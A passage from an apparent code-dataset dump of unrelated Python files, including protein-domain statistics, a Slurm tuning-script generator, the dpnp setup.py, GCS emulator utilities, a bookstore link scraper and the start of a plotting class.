'-' + str(thsnow.day) + '-' +\n str(thsnow.year) + '_' + str(thsnow.hour) + 'h' + str(thsnow.minute) + 'm')\n\n\nindex_f = open('../../data/pfams/clan_indices_11-11-2016_12h24m.pkl', 'rb')\nprot_names = pickle.load(index_f)\nprot_clans = pickle.load(index_f)\nprot_dict = pickle.load(index_f)\nclan_list = pickle.load(index_f)\nclan_dict = pickle.load(index_f)\nindex_f.close()\n\n## summary statistics 1:\n# domains per protein\ndom_per_prot = [len(prot) for prot in prot_clans]\n\n# unique domains per protein\nudom_per_prot = [len(set([pdet[0] for pdet in prot])) for prot in prot_clans]\n\n# pfam coverage -> gaps between protein domains (can't get full length)\npf_gaps = []\nfor prot in prot_clans:\n for domi in range(len(prot)-1):\n pf_gaps.append(prot[domi+1][1] - prot[domi][2])\n\n# decision entropy\ndec_entropy = np.zeros(len(prot_clans))\nfor proti, prot in enumerate(prot_clans):\n if len(prot) < 2:\n continue\n pfvec = [pdet[0] for pdet in prot]\n uset = [el for el in set(pfvec)]\n umult = [sum([pfi == pfj for pfj in pfvec]) for pfi in uset]\n for pfi_i, pfi in enumerate(uset):\n nextvec = []\n for pfj_i, pfj in enumerate(pfvec[:-1]):\n if pfj == pfi:\n nextvec.append(pfvec[pfj_i+1])\n unext = [el for el in set(nextvec)]\n unextpi = [sum([pfi == pfj for pfj in nextvec])/float(len(nextvec)) for pfi in unext]\n dec_entropy[proti] += sum([-math.log(um)*um for um in unextpi])*umult[pfi_i]\n\nout_summary1 = open(out_loc + 'summary_stats1_' + timestr + '.pkl', 'wb')\npickle.dump(dom_per_prot, out_summary1)\npickle.dump(udom_per_prot, out_summary1)\npickle.dump(pf_gaps, out_summary1)\npickle.dump(dec_entropy, out_summary1)\npickle.dump(prot_names, out_summary1)\nout_summary1.close()\n\n# step 8: hash adjoining clans\nnhash = 2\nsethash = [[] for si in range(shsize)]\nhashloc = [[] for si in range(shsize)]\nfor proti, prot in enumerate(prot_clans):\n for domi in range(len(prot)-1):\n thsrng = range(domi, domi + nhash)\n doml = [prot[hi][0] for hi in thsrng]\n skey = doml #[int(x[-name_digits:]) for x in doml]\n\n # sort, to make sure all orders get mapped to same place\n sdomi = [x for (y,x) in sorted(zip(skey, thsrng))]\n sdoml = [x for (y,x) in sorted(zip(skey, doml))]\n hashi = hashp(sdoml)\n\n if len(hashloc[hashi]) == 0:\n hashloc[hashi] = [sdoml]\n sethash[hashi] = [[[proti, sdomi]]]\n else:\n found = False\n for subi, sub in enumerate(hashloc[hashi]):\n if sub == sdoml:\n sethash[hashi][subi].append([proti, sdomi])\n found = True\n break\n if found == False:\n hashloc[hashi].append(sdoml)\n sethash[hashi].append([[proti, sdomi]])\n\n# compile pfam pairs list from hash table\npfpairs = []\npfpairlocs = []\npairmap = [[] for el in clan_list]\ncount = 0\nfor hsi in range(shsize):\n for hsj in range(len(hashloc[hsi])):\n pfpairs.append(hashloc[hsi][hsj])\n pfpairlocs.append(sethash[hsi][hsj])\n pairmap[clan_dict[hashloc[hsi][hsj][0]]].append(count)\n if hashloc[hsi][hsj][0] != hashloc[hsi][hsj][1]:\n pairmap[clan_dict[hashloc[hsi][hsj][1]]].append(count)\n count += 1\n\nout_pairs = open(out_loc + 'pfam_pairs_' + timestr + '.pkl', 'wb')\npickle.dump(pfpairs, out_pairs)\npickle.dump(pfpairlocs, out_pairs)\npickle.dump(pairmap, out_pairs)\nout_pairs.close()\n\n## summary statistics 2:\n# count incidence of adjacent pairs of domains in either order\nordercounts = np.zeros([len(pfpairs), 2])\nfor pfi in range(len(pfpairlocs)):\n for loci in range(len(pfpairlocs[pfi])):\n if pfpairlocs[pfi][loci][1][1] > pfpairlocs[pfi][loci][1][0]:\n ordercounts[pfi][0] += 1\n else:\n ordercounts[pfi][1] += 1\n\nout_summary2 = open(out_loc + 'summary_stats2_' + timestr + '.pkl', 'wb')\npickle.dump(ordercounts, out_summary2)\npickle.dump(pfpairs, out_summary2)\nout_summary2.close()\n","sub_path":"PfamLogic/DomainParse_summary2.py","file_name":"DomainParse_summary2.py","file_ext":"py","file_size_in_byte":5293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"369714226","text":"import calculations\na,b = input().split() #input 2 no.s\nch =int(input()) # input choice for calculator\na=int(a)\nb=int(b)\nif(ch==1):\n print(calc.sum(a,b))\nif(ch==2):\n print(calc.subtract(a,b))\nif(ch==3):\n print(calc.multiply(a,b))\nif(ch==4):\n print(int(calc.divide(a,b)))\n","sub_path":"Module and Package/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"68888815","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport yaml\nimport os\nimport sys\nimport itertools\nimport numpy as np\n\n# add this line to avoid weird characters in yaml files\nyaml.Dumper.ignore_aliases = lambda *args : True\n\n\ndef grouper(iterable, n):\n args = [iter(iterable)] * n\n return ([e for e in t if e != None] for t in itertools.zip_longest(*args))\n\n\ndef gen_slurm_script(command, config_dir, experiment_id_list, dataset_name, gpus, dataset, model_name):\n n_workers = gpus\n cmd_sequence_list = []\n experiment_id_list = [exp for exp in experiment_id_list if model_name in exp]\n for idx, exp_list in enumerate(np.array_split(experiment_id_list, n_workers)):\n if len(exp_list) == 0 or (\"Base\" in exp_list and len(exp_list)==1): continue\n cmd_list = []\n for experiment_id in exp_list:\n if experiment_id == \"Base\": continue\n cmd = 'srun -p gpu_24h --gres=gpu:1 python_slurm {} -dataset {} -config {} -exp {} -gpu {}'\\\n .format(command, dataset, config_dir+\"/model_config.yaml\", experiment_id, 0)\n# cmd = 'python {} -config {} -exp {} -gpu {}'\\\n# .format(command, config_dir+\"/model_config.yaml\", experiment_id, 0)\n\n cmd_list.append(cmd)\n cmd_sequence = ' && '.join(cmd_list)\n cmd_sequence += ' &'\n cmd_sequence_list.append(cmd_sequence)\n print(cmd_sequence)\n print(\"Total : {}\".format(len(experiment_id_list)))\n \n np.random.shuffle(cmd_sequence_list)\n\n with open(\"./slurm_script_{}_{}.sh\".format(model_name, dataset_name), \"w\") as fw:\n fw.write(\"#!/bin/bash\\n\")\n fw.write(\"#SBATCH --gres=gpu:{}\\n\".format(n_workers))\n fw.write(\"#SBATCH --cpus-per-task={}\\n\".format(n_workers))\n fw.write(\"#SBATCH -p gpu_24h\\n\")\n for cmd in cmd_sequence_list:\n fw.write(cmd + \"\\n\")\n \ndef product_params(tune_dict, model_dict, experiment_id):\n model_dict = {k: tune_dict[k] if k in tune_dict else [v] for k, v in model_dict.items()}\n model_para_keys = list(model_dict.keys())\n model_param_combs = dict()\n for idx, values in enumerate(itertools.product(*map(model_dict.get, model_para_keys))):\n param_dict = dict(zip(model_para_keys, values))\n model_id = experiment_id + '_{:03d}'.format(idx + 1)\n# param_dict[\"model_id\"] = model_id\n model_param_combs[model_id] = param_dict\n return model_param_combs\n\ndef enumerate_params(config_file, experiment_id):\n with open(config_file, 'r') as cfg:\n config_dict = yaml.load(cfg)\n\n config_dir = config_file.rstrip('.yaml') + \"_\" + experiment_id\n if not os.path.exists(config_dir):\n os.makedirs(config_dir)\n\n # model params\n model_dict = config_dict[experiment_id]\n \n # base\n base = config_dict[\"Base\"]\n \n # tuning space\n\n # enumerate model para combinations\n if model_dict[\"net\"] in [\"distill\", \"rocket\"]:\n tune_dict = config_dict['tuner_space'][model_dict[\"net\"]]\n teacher_dict = tune_dict.get(\"teacher\", {})\n student_dict = tune_dict.get(\"student\", {})\n others_dict = tune_dict.get(\"others\", {})\n teachers = product_params(teacher_dict, model_dict[\"teacher\"], \"T\")\n students = product_params(student_dict, model_dict[\"student\"], \"S\")\n tmp_dict = {k:v for k,v in model_dict.items() if k not in [\"teacher\", \"student\"]}\n others = product_params(others_dict, tmp_dict , \"meta\")\n res = list(itertools.product(teachers.keys(), students.keys(), others.keys()))\n model_param_combs = {}\n for idx, (t_id, s_id, meta_id) in enumerate(res):\n comb = {\"teacher\": teachers[t_id],\n \"student\": students[s_id], \n **others[meta_id]} \n model_id = experiment_id + '_{:03d}'.format(idx + 1)\n model_param_combs[model_id] = comb\n elif model_dict[\"net\"] in [\"ensemble\"]:\n tune_dict = config_dict['tuner_space'][model_dict[\"net\"]]\n student_dict = tune_dict[\"student\"]\n others_dict = tune_dict[\"others\"]\n students = product_params(student_dict, model_dict[\"student\"], \"S\")\n tmp_dict = {k:v for k,v in model_dict.items() if k not in [\"student\"]}\n others = product_params(others_dict, tmp_dict , \"meta\")\n res = list(itertools.product(students.keys(), others.keys()))\n model_param_combs = {}\n for idx, (s_id, meta_id) in enumerate(res):\n comb = {\"student\": students[s_id],\n **others[meta_id]}\n model_id = experiment_id + '_{:03d}'.format(idx + 1)\n model_param_combs[model_id] = comb\n else:\n tune_dict = {}\n if 'common' in config_dict['tuner_space']:\n tune_dict.update(config_dict['tuner_space']['common'])\n if model_dict[\"net\"] in config_dict['tuner_space']:\n tune_dict.update(config_dict['tuner_space'][model_dict[\"net\"]])\n model_param_combs = product_params(tune_dict, model_dict, experiment_id)\n\n if model_dict[\"net\"] in [\"ensemble\", \"gate\"]:\n for teacher_name in model_dict[\"teacher_name_list\"]:\n try:\n model_param_combs[teacher_name] = config_dict[teacher_name]\n except:\n print(\"{} missed\".format(teacher_name))\n \n # dump model para combinations to config file\n model_param_combs[\"Base\"] = base\n with open(os.path.join(config_dir, 'model_config.yaml'), 'w') as fw:\n yaml.dump(model_param_combs, fw, default_flow_style=None, indent=4)\n\n save_dict = {\"tune_space\": tune_dict, experiment_id: model_dict}\n with open(os.path.join(config_dir, 'tune_space.yaml'), 'w') as fw:\n yaml.dump(save_dict, fw, default_flow_style=None, indent=4)\n return config_dir, list(model_param_combs.keys())\n\n# wide_deep DeepFM DNN xDeepFM DCN\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-command', type=str, default='benchmark.py', help='The benchmark command.')\n parser.add_argument('-exp', type=str, default='DAN', help='The base config setting.')\n parser.add_argument('-gpus', type=int, default=1, help='The list of indices of gpus, -1 for cpu.')\n parser.add_argument('-dataset', type=str, default='avazu', help='Dataset to run.')\n args = vars(parser.parse_args())\n gpus = args['gpus']\n command = args['command']\n dataset_name = args[\"dataset\"]\n config_file = '../config/{}/{}_tune.yaml'.format(dataset_name, dataset_name)\n \n # generate parameter space combinations\n config_dir, experiment_id_list = enumerate_params(config_file, args['exp'])\n gen_slurm_script(command, config_dir, experiment_id_list, dataset_name, gpus, args['dataset'], args[\"exp\"])\n \n \n# enumerate_params(\"../config/avazu_tune.yaml\", \"graph_01\")\n# gen_slurm_script(\"train.py\", )\n ","sub_path":"benchmark/auto_tuner.py","file_name":"auto_tuner.py","file_ext":"py","file_size_in_byte":6858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"141084686","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# *****************************************************************************\n# Copyright (c) 2016-2020, Intel Corporation\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# - Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# - Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF\n# THE POSSIBILITY OF SUCH DAMAGE.\n# *****************************************************************************\n\n\"\"\" NumPy is the fundamental package for array computing with Python.\n\nIt provides:\n\n- a powerful N-dimensional array object\n- sophisticated (broadcasting) functions\n- tools for integrating C/C++ and Fortran code\n- useful linear algebra, Fourier transform, and random number capabilities\n- and much more\n\n\"\"\"\n\nimport importlib.machinery as imm # Python 3 is required\nimport sys\nimport os\nimport numpy\n\nfrom setuptools import setup, Extension\nfrom Cython.Build import cythonize\nfrom Cython.Compiler import Options as cython_options\n\nfrom utils.command_style import source_style\nfrom utils.command_clean import source_clean\nfrom utils.command_build_clib import custom_build_clib\n\n\n\"\"\"\nPython version check\n\"\"\"\nif sys.version_info[:2] < (3, 6):\n raise RuntimeError(\"Intel NumPy: Python version >= 3.5 required.\")\n\n\n\"\"\"\nGet the project version\n\"\"\"\nthefile_path = os.path.abspath(os.path.dirname(__file__))\nversion_mod = imm.SourceFileLoader('version', os.path.join(thefile_path, 'dpnp', '_version.py')).load_module()\n__version__ = version_mod.__version__\n\n\n\"\"\"\nSet project auxilary data like readme and licence files\n\"\"\"\nwith open('README.md') as f:\n __readme_file__ = f.read()\n\nwith open('LICENSE.txt') as f:\n __license_file__ = f.read()\n\nCLASSIFIERS = \"\"\"\\\nDevelopment Status :: 0 - Alpha\nIntended Audience :: Science/Research\nIntended Audience :: Developers\nLicense :: OSI Approved\nProgramming Language :: C\nProgramming Language :: Python\nProgramming Language :: Python :: 3\nProgramming Language :: Python :: 3.6\nProgramming Language :: Python :: 3.7\nProgramming Language :: Python :: 3.8\nProgramming Language :: Python :: Implementation :: CPython\nTopic :: Software Development\nTopic :: Scientific/Engineering\nOperating System :: Microsoft :: Windows\nOperating System :: POSIX\nOperating System :: Unix\nOperating System :: MacOS\n\"\"\"\n\nIS_WIN = False\nIS_MAC = False\nIS_LIN = False\n\nif 'linux' in sys.platform:\n IS_LIN = True\nelif sys.platform == 'darwin':\n IS_MAC = True\nelif sys.platform in ['win32', 'cygwin']:\n IS_WIN = True\nelse:\n raise EnvironmentError(\"Intel NumPy: \" + sys.platform + \" not supported\")\n\n\"\"\"\nSet compiler for the project\n\"\"\"\n# default variables (for Linux)\n_project_compiler = \"clang++\"\n_project_linker = \"clang++\"\n_project_cmplr_flag_sycl_devel = [\"-fsycl-device-code-split=per_kernel\"]\n_project_cmplr_flag_sycl = [\"-fsycl\"]\n_project_cmplr_flag_compatibility = [\"-Wl,--enable-new-dtags\", \"-fPIC\"]\n_project_cmplr_flag_lib = []\n_project_cmplr_macro = []\n_project_sycl_queue_control_macro = [(\"DPNP_LOCAL_QUEUE\", \"1\")]\n_project_rpath = [\"$ORIGIN\"]\n_dpctrl_include = []\n_dpctrl_libpath = []\n_dpctrl_lib = []\n\n\ntry:\n \"\"\"\n Detect external SYCL queue handling library\n \"\"\"\n import dpctrl\n\n # TODO this will not work with no Conda environment\n _conda_root = os.environ.get('CONDA_PREFIX', \"conda_include_error\")\n _dpctrl_include += [os.path.join(_conda_root, 'include')]\n _dpctrl_libpath += [os.path.join(_conda_root, 'lib')]\n _dpctrl_lib += [\"dpctrlsyclinterface\"]\nexcept ImportError:\n \"\"\"\n Set local SYCL queue handler\n \"\"\"\n _project_cmplr_macro += _project_sycl_queue_control_macro\n\n\n# other OS specific\nif IS_WIN:\n _project_compiler = \"dpcpp-cl\" # \"clang-cl\"\n _project_linker = \"lld-link\" # \"dpcpp-cl\"\n _project_cmplr_flag_sycl = []\n _project_cmplr_flag_compatibility = []\n _project_cmplr_flag_lib = ['/DLL']\n _project_cmplr_macro = [(\"_WIN\", \"1\"), (\"MKL_ILP64\", \"1\")]\n _project_rpath = []\n # TODO obtain setuptools.compiler.buildline options line and replace /MD with /MT instead adding it\n os.environ[\"CFLAGS\"] = \"/MT\"\n\n\ntry:\n \"\"\"\n set environment variables to control setuptools build procedure\n \"\"\"\n # check if we have preset variables in environment\n os.environ[\"CC\"] == _project_compiler\n os.environ[\"CXX\"] == _project_compiler\n os.environ[\"LD\"] == _project_linker\nexcept KeyError:\n # set variables if not presented in environment\n os.environ[\"CC\"] = _project_compiler\n os.environ[\"CXX\"] = _project_compiler\n os.environ[\"LD\"] = _project_linker\n\n\n\"\"\"\nGet the project build type\n\"\"\"\n__dpnp_debug__ = os.environ.get('DEBUG', None)\nif __dpnp_debug__ is not None:\n _project_cmplr_flag_sycl += _project_cmplr_flag_sycl_devel\n\n\n\"\"\"\nSearch and set MKL environemnt\n\"\"\"\n_mkl_rpath = []\n_cmplr_rpath = []\n_omp_rpath = []\n\n\n_mkl_root = os.environ.get('MKLROOT', None)\nif _mkl_root is None:\n raise EnvironmentError(\"Intel NumPy: Please install Intel OneAPI environment. MKLROOT is empty\")\n_mkl_include = [os.path.join(_mkl_root, 'include')]\n_mkl_libs = ['mkl_rt', 'mkl_sycl', 'mkl_intel_ilp64', 'mkl_tbb_thread', 'mkl_core', 'tbb', 'iomp5']\n\n_mkl_libpath = [os.path.join(_mkl_root, 'lib', 'intel64')]\nif IS_LIN:\n _mkl_rpath = _mkl_libpath\nelif IS_WIN:\n _mkl_libs = [\"mkl_sycl\", \"mkl_intel_ilp64\", \"mkl_tbb_thread\", \"mkl_core\", \"sycl\", \"OpenCL\", \"tbb\"]\n\n_cmplr_root = os.environ.get('ONEAPI_ROOT', None)\nif _cmplr_root is None:\n raise EnvironmentError(\"Please install Intel OneAPI environment. ONEAPI_ROOT is empty\")\n\nif IS_LIN:\n _cmplr_libpath = [os.path.join(_cmplr_root, 'compiler', 'latest', 'linux', 'lib')]\n _omp_libpath = [os.path.join(_cmplr_root, 'compiler', 'latest', 'linux', 'compiler', 'lib', 'intel64')]\n _cmplr_rpath = _cmplr_libpath\n _omp_rpath = _omp_libpath\nelif IS_WIN:\n _cmplr_libpath = [os.path.join(_cmplr_root, 'compiler', 'latest', 'windows', 'lib')]\n _omp_libpath = [os.path.join(_cmplr_root, 'compiler', 'latest', 'windows', 'compiler', 'lib', 'intel64_win')]\n\n\n\"\"\"\nFinal set of arguments for extentions\n\"\"\"\n_project_extra_link_args = _project_cmplr_flag_compatibility + [\"-Wl,-rpath,\" + x for x in _project_rpath]\n_project_dir = os.path.dirname(os.path.abspath(__file__))\n_project_main_module_dir = [os.path.join(_project_dir, \"dpnp\")]\n_project_backend_dir = [os.path.join(_project_dir, \"dpnp\", \"backend\")]\n\n\n\"\"\"\nExtra defined commands for the build system\n\n>$ python ./setup.py --help-commands\n\n>$ python ./setup.py style\n>$ python ./setup.py style -a\n>$ python ./setup.py clean\n\nTODO: spell check, valgrind, code coverage\n\"\"\"\ndpnp_build_commands = {'style': source_style,\n 'build_clib': custom_build_clib,\n 'clean': source_clean\n }\n\n\n\"\"\"\nThe project modules description\n\"\"\"\ndpnp_backend_c = [\n [\"dpnp_backend_c\",\n {\n \"sources\": [\n \"dpnp/backend/backend_iface_fptr.cpp\",\n \"dpnp/backend/custom_kernels.cpp\",\n \"dpnp/backend/custom_kernels_elemwise.cpp\",\n \"dpnp/backend/custom_kernels_manipulation.cpp\",\n \"dpnp/backend/custom_kernels_reduction.cpp\",\n \"dpnp/backend/custom_kernels_searching.cpp\",\n \"dpnp/backend/custom_kernels_sorting.cpp\",\n \"dpnp/backend/custom_kernels_statistics.cpp\",\n \"dpnp/backend/memory_sycl.cpp\",\n \"dpnp/backend/mkl_wrap_blas1.cpp\",\n \"dpnp/backend/mkl_wrap_blas3.cpp\",\n \"dpnp/backend/mkl_wrap_lapack.cpp\",\n \"dpnp/backend/mkl_wrap_rng.cpp\",\n \"dpnp/backend/queue_sycl.cpp\"\n ],\n \"include_dirs\": _mkl_include + _project_backend_dir + _dpctrl_include,\n \"library_dirs\": _mkl_libpath + _omp_libpath + _dpctrl_libpath,\n \"runtime_library_dirs\": _project_rpath + _mkl_rpath + _cmplr_rpath + _omp_rpath + _dpctrl_libpath,\n \"extra_preargs\": _project_cmplr_flag_sycl,\n \"extra_link_postargs\": _project_cmplr_flag_compatibility + _project_cmplr_flag_lib,\n \"libraries\": _mkl_libs + _dpctrl_lib,\n \"macros\": _project_cmplr_macro,\n \"language\": \"c++\"\n }\n ]\n]\n\ndpnp_backend = Extension(\n name=\"dpnp.backend\",\n sources=[\"dpnp/backend.pyx\"],\n libraries=[],\n include_dirs=[numpy.get_include()] + _project_backend_dir,\n extra_compile_args=[],\n extra_link_args=_project_extra_link_args,\n define_macros=[(\"NPY_NO_DEPRECATED_API\", \"NPY_1_7_API_VERSION\")],\n language=\"c++\"\n)\n\ndpnp_dparray = Extension(\n name=\"dpnp.dparray\",\n sources=[\"dpnp/dparray.pyx\"],\n libraries=[],\n include_dirs=[numpy.get_include()] + _project_backend_dir,\n extra_compile_args=[],\n extra_link_args=_project_extra_link_args,\n define_macros=[(\"NPY_NO_DEPRECATED_API\", \"NPY_1_7_API_VERSION\")],\n language=\"c++\"\n)\n\ndpnp_random = Extension(\n name=\"dpnp.random._random\",\n sources=[\"dpnp/random/_random.pyx\"],\n include_dirs=[numpy.get_include()] + _project_backend_dir,\n extra_link_args=_project_extra_link_args,\n define_macros=[(\"NPY_NO_DEPRECATED_API\", \"NPY_1_7_API_VERSION\")],\n language=\"c++\"\n)\n\ndpnp_utils = Extension(\n name=\"dpnp.dpnp_utils\",\n sources=[\"dpnp/dpnp_utils.pyx\"],\n include_dirs=[numpy.get_include()] + _project_backend_dir,\n extra_compile_args=[],\n extra_link_args=_project_extra_link_args,\n define_macros=[(\"NPY_NO_DEPRECATED_API\", \"NPY_1_7_API_VERSION\")],\n language=\"c++\"\n)\n\ndpnp_linalg = Extension(\n name=\"dpnp.linalg.linalg\",\n sources=[\"dpnp/linalg/linalg.pyx\"],\n include_dirs=[numpy.get_include()] + _project_backend_dir,\n extra_link_args=_project_extra_link_args,\n define_macros=[(\"NPY_NO_DEPRECATED_API\", \"NPY_1_7_API_VERSION\")],\n language=\"c++\"\n)\n\ncython_options.docstrings = True\ncython_options.embed_pos_in_docstring = True\ncython_options.warning_errors = True\n\ndpnp_cython_mods = cythonize([dpnp_backend, dpnp_dparray, dpnp_random, dpnp_utils, dpnp_linalg],\n compiler_directives={\"language_level\": sys.version_info[0],\n \"warn.unused\": False,\n \"warn.unused_result\": False,\n \"warn.maybe_uninitialized\": False,\n \"warn.undeclared\": False,\n \"boundscheck\": True,\n \"linetrace\": True\n },\n gdb_debug=False,\n build_dir=\"build_cython\",\n annotate=False,\n quiet=False)\n\nsetup(name=\"DPNP\",\n version=__version__,\n description=\"Subclass of numpy.ndarray that uses mkl_malloc\",\n long_description=__readme_file__,\n author=\"Intel Corporation\",\n author_email=\"Intel Corporation\",\n maintainer=\"Intel Corp.\",\n maintainer_email=\"scripting@intel.com\",\n url=\"http://github.com/IntelPython/mkl_array\",\n download_url=\"http://github.com/IntelPython/mkl_array\",\n license=__license_file__,\n classifiers=[_f for _f in CLASSIFIERS.split('\\n') if _f],\n keywords=\"python numeric algebra blas\",\n platforms=[\"Linux\", \"Windows\", \"Mac OS-X\"],\n test_suite=\"pytest\",\n python_requires=\">=3.6\",\n install_requires=[\"numpy>=1.15\"],\n setup_requires=[\"numpy>=1.15\"],\n tests_require=[\"numpy>=1.15\"],\n ext_modules=dpnp_cython_mods,\n cmdclass=dpnp_build_commands,\n packages=['dpnp',\n 'dpnp.random',\n 'dpnp.linalg',\n ],\n package_data={'dpnp': ['libdpnp_backend_c.so']},\n include_package_data=True,\n\n # this is needed for 'build' command to automatically call 'build_clib'\n # it attach the library to all extensions (it is not needed)\n libraries=dpnp_backend_c\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":13118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"577692099","text":"# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Common utils\"\"\"\n\nimport re\nimport scalpl\nimport types\n\nre_remove_index = re.compile(r\"\\[\\d+\\]+|^[0-9]+\")\n\n# === STR === #\n\n\nre_snake_case = re.compile(r\"(? [\"kind\", \"items.id\", \"items.name\"]\n res = []\n for i, c in enumerate(fields):\n if c != \" \" and c != \")\":\n if c == \"/\":\n res.append(\".\")\n else:\n res.append(c)\n elif c == \")\":\n childrens_fields = []\n tmp_field = []\n while res:\n if res[-1] != \",\" and res[-1] != \"(\":\n tmp_field.append(res.pop())\n else:\n childrens_fields.append(tmp_field)\n tmp_field = []\n if res.pop() == \"(\":\n break\n parent_field = []\n while res and res[-1] != \",\" and res[-1] != \"(\":\n parent_field.append(res.pop())\n for i, field in enumerate(childrens_fields):\n res.extend(parent_field[::-1])\n res.append(\".\")\n while field:\n res.append(field.pop())\n if i < len(childrens_fields) - 1:\n res.append(\",\")\n return \"\".join(res).split(\",\")\n\n\ndef filter_response_rest(response, projection, fields):\n if fields is not None:\n fields = parse_fields(fields)\n deleted_keys = set()\n for key in nested_key(response):\n simplfied_key = remove_index(key)\n maybe_delete = True\n if projection == \"noAcl\":\n maybe_delete = False\n if simplfied_key.startswith(\"owner\"):\n deleted_keys.add(\"owner\")\n elif simplfied_key.startswith(\"items.owner\"):\n deleted_keys.add(\"items.owner\")\n elif simplfied_key.startswith(\"acl\"):\n deleted_keys.add(\"acl\")\n elif simplfied_key.startswith(\"items.acl\"):\n deleted_keys.add(key[0 : key.find(\"acl\") + len(\"acl\")])\n elif simplfied_key.startswith(\"defaultObjectAcl\"):\n deleted_keys.add(\"defaultObjectAcl\")\n elif simplfied_key.startswith(\"items.defaultObjectAcl\"):\n deleted_keys.add(\n key[0 : key.find(\"defaultObjectAcl\") + len(\"defaultObjectAcl\")]\n )\n else:\n maybe_delete = True\n if fields is not None:\n if maybe_delete:\n for field in fields:\n if simplfied_key.startswith(field):\n maybe_delete = False\n break\n if maybe_delete:\n deleted_keys.add(key)\n proxy = scalpl.Cut(response)\n print(\"delete: \", deleted_keys)\n for key in deleted_keys:\n del proxy[key]\n return proxy.data\n\n\n# === RESPONSE === #\n\n\ndef extract_projection(request, default, context):\n if context is not None:\n return request.projection if request.projection != 0 else default\n else:\n projection_map = [\"noAcl\", \"full\"]\n projection = request.args.get(\"projection\")\n return (\n projection if projection in projection_map else projection_map[default - 1]\n )\n","sub_path":"google/cloud/storage/emulator/utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":5305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"328948953","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 10 15:04:09 2021\r\n\r\n@author: linn2\r\n\"\"\"\r\n\r\nimport requests\r\nimport re\r\nfrom bs4 import BeautifulSoup\r\n\r\nurl = 'https://www.books.com.tw/web/sys_saletopb/books/'\r\ndata = requests.get(url)\r\nsoup = BeautifulSoup(data.text)\r\n\r\na_tag = soup.find_all('a')\r\n\r\nfor tag in a_tag:\r\n url = tag['href']\r\n \r\n if re.fullmatch('https://www.books.com.tw/web/sys_saletopb/books/(\\d{2})/[?]loc=P_0002_(\\d{3})', url): \r\n print(url)\r\n \r\n \r\n\r\n\r\n\r\n","sub_path":"class4-2.py","file_name":"class4-2.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"289104080","text":"#!/usr/bin/env python3\n#pylint: disable=C0103,W0201,W0702,R1710,R1702,too-many-instance-attributes\n\"\"\"A matplotlib based python plot framework\"\"\"\nfrom __future__ import absolute_import\nimport os\nimport warnings\nimport json\nimport logging\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import stats\nfrom .kitdata import KITData\nfrom .KITConfig import KITConfig\nfrom .kitmatplotlib import KITMatplotlib\nfrom .kitlodger import KITLodger\n\nclass KITPlot():\n \"\"\"The framework's main class that handles the data input and top level\n organization of the plotting.\n\n Args:\n - cfg (str): Path to existing cfg file that contains plot parameters\n - defaultCfg (str): Path to existing cfg file that is used as a\n blueprint for creating a new cfg file\n \"\"\"\n def __init__(self, **kwargs):\n self.log = logging.getLogger(__class__.__name__)\n self.log.setLevel(logging.DEBUG)\n if self.log.hasHandlers() is False:\n format_string = '%(asctime)s - %(levelname)s - %(name)s - %(message)s'\n formatter = logging.Formatter(format_string)\n console_handler = logging.StreamHandler()\n console_handler.setFormatter(formatter)\n self.log.addHandler(console_handler)\n self.log.info(\"KITPlot initialized...\")\n\n # ignore warning that is raised because of back-end bug while using 'waitforbuttonpress'\n warnings.filterwarnings(\"ignore\", \".*GUI is implemented.*\")\n\n self.iter = iter([\"lodger1\", \"lodger2\", \"lodger3\"])\n\n # init lists\n self.__files = []\n self.__graphs = []\n # Load parameters from cfg file or load default cfg\n cfg = kwargs.get('cfg', None)\n defaultCfg = kwargs.get('defaultCfg', None)\n self.auto_labeling = kwargs.get('auto_labeling', True)\n self.opt_reset = kwargs.get('reset_legend', None)\n self.opt_split 